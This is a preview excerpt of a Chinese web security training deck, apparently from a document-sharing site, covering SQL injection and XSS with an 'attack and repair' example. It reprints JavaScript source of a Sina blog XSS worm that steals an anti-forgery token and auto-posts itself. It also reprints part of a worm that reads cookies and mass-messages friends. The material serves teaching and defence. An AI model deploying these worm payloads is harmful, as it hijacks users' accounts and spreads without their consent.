预览加载中,请您耐心等待几秒...
1/10
2/10
3/10
4/10
5/10
6/10
7/10
8/10
9/10
10/10

亲,该文档总共86页,到这已经超出免费预览范围,如果喜欢就直接下载吧~

如果您无法下载资料,请参考说明:

1、部分资料下载需要金币,请确保您的账户上有足够的金币

2、已购买过的文档,再次下载不重复扣费

3、资料包下载后请先用软件解压,在使用对应软件打开

内容简介 1.知己知彼,百战不殆 2.解析黑客手中的利器 3.捍卫代码城堡 4.剑走偏锋 5.惊栗后的深思 6.双剑合壁脚本安全编程重要性WEB攻击流程WEB攻击流程黑客攻击技术曝光 SQL注入利用的是参数传递的时候过滤不严时用参数组合成正确的SQL语句来执行操作的技术。 简单的理解为:涉及进入SQL语句操作的变量没有过滤输入与转义输出 实例-夜猫软件下载系统(攻击与修复) http://10.210.128.58/ymdown/show.php?id=1黑客攻击技术曝光 XSS又叫CSS(CrossSiteScript),跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码(恶意JS代码),当用户浏览该页之时,嵌入其中Web里面的html代码(恶意JS代码)会被执行,从而达到恶意用户的特殊目的。 输入一些数据需要在页面中显示出来,但是没有对这段数据做过滤输入或者转义输出。xss特点 继承浏览器权限 社会工程,被动攻击 影响广泛(只要浏览器支持JavaScript) 隐蔽,难以察觉 XSS可能出现在哪? 1.HTML标签外部 2.HTML标签内部(属性、事件) 3.输入到javascript代码 百度XSS蠕虫攻击统计 新浪博客v5.0蠕虫 varblogtitle="IOwNedyouRBloG" varblogbody="You\'rEmYfOOd.<br><ahref=\"http://sex1986.com\">蠕虫传播主体,不要构造这里</a>" varxmlhttp=newActiveXObject("Msxml2.XMLHTTP.3.0"); xmlhttp.open("GET","/admin/article/article_add.php",false); xmlhttp.send(); varxss=xmlhttp.responseText; token=xss.indexOf("vtoken"); if(token>0) { vtoken=xss.substr(token+15,32); xmlhttp.open('post','/admin/article/article_post.php',false); xmlhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); xmlhttp.send('album=&blog_id=&is_album=0&stag=&sno=&channel_id=&url=&channel=&newsid=&book_worksid=&vtoken='+vtoken+'&is_media=0&blog_title='+blogtitle+'&blog_body='+blogbody+'&tag=&blog_class=0&x_cms_flag=1&sina_sort_id=117&is2bbs=1&join_circle=1'); varsuss=xmlhttp.responseText; send=suss.indexOf("06001"); if(send>0) { //alert("感染成功:)"); document.location="http://sina.com.cn/";}else{ alert("感染失败:("); } }新浪空间好友纸条群发蠕虫 '---获取cookie中的uid--- cookie=unescape(request("cookie")) cflag=Instr(cookie,"nick=") dflag=Instr(cookie,");") …………………省略…………………….. '---遍历好友数--- fori=1to500 '---得到此uid的好友--- url="http://v.space.sina.com.cn/friend/list.php?uid="&uid&"&page="&i&"&pagesize=1" xml.open"GET",url,False xml.send htmlcon=b2bstr(xml.responsebody) '---提取好友uid--- aflag=Instr(htmlcon,"{""record"":[{""uid"":""") bflag=InStr(htmlcon,""",""ftype""") Ifaflag<>0Andbflag<>0Then okflag=Replace(Replace(mid(htmlcon,aflag,bflag),"{""record"